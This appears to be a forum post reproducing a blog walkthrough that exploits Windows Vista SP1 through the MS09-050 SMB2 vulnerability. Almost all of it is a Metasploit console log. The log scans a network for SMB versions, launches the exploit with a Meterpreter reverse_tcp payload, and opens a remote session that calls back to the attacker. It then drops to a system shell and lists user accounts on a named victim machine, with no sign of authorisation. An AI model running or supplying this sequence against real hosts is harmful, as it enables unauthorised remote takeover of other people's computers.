Jump to content


  • Posts

  • Joined

  • Last visited

Everything posted by djmed

  1. http://evilc0de.blogspot.com/2010/09/exploiting-vista-sp1-with-smb2.html [o] Exploiting Vista SP1 with SMB2 [metasploit] [o] Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference root@evilc0de:~# msfconsole <> ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 590 exploits - 302 auxiliary + -- --=[ 224 payloads - 27 encoders - 8 nops =[ svn r10414 updated today (2010.09.21) msf > use scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(smb_version) > set RHOSTS RHOSTS => msf auxiliary(smb_version) > set THREADS 50 THREADS => 50 msf auxiliary(smb_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 50 yes The number of concurrent threads msf auxiliary(smb_version) > run [*] is running Windows 7 Professional (Build 7600) (language: Unknown) (name:ONAN-ULTIMECIA) (domain:ONAN-ULTIMECIA) [*] is running Windows Vista Ultimate Service Pack 1 (language: Unknown) (name:PUPEN-SNOWBLACK) (domain:KAPUKVALLEY) [*] is running Windows XP Service Pack 2+ (language: English) (name:ALLSTAR-TAPO) (domain:KAPUKVALLEY) [*] is running Windows 7 Ultimate (Build 7600) (language: Unknown) (name:PINKY-BENZ) (domain:KAPUKVALLEY) msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index msf exploit(ms09_050_smb2_negotiate_func_index) > info Name: Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference Version: 9669 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Rank: Good Provided by: laurent.gaffie hdm sf Available targets: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload information: Space: 1024 Description: This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw. References: http://www.microsoft.com/technet/security/bulletin/MS09-050.mspx http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3103 http://www.securityfocus.com/bid/36299 http://www.osvdb.org/57799 http://seclists.org/fulldisclosure/2009/Sep/0039.html http://www.microsoft.com/technet/security/Bulletin/MS09-050.mspx msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST RHOST => msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST LHOST => msf exploit(ms09_050_smb2_negotiate_func_index) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes The target port WAIT 180 yes The number of seconds to wait for the attack to complete. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows Vista SP1/SP2 and Server 2008 (x86) msf exploit(ms09_050_smb2_negotiate_func_index) > exploit [*] Started reverse handler on [*] Connecting to the target ( [*] Sending the exploit packet (872 bytes)... [*] Waiting up to 180 seconds for exploit to trigger... [*] Sending stage (748544 bytes) to [*] Meterpreter session 1 opened ( -> at 2010-09-21 23:31:10 +0700 meterpreter > sysinfo Computer: PUPEN-SNOWBLACK OS : Windows Vista (Build 6001, Service Pack 1). Arch : x86 Language: en_US meterpreter > shell Process 1240 created. Channel 1 created. Microsoft Windows [Version 6.0.6001] Copyright © 2006 Microsoft Corporation. All rights reserved. C:\Windows\system32>net user net user User accounts for \\
  • Create New...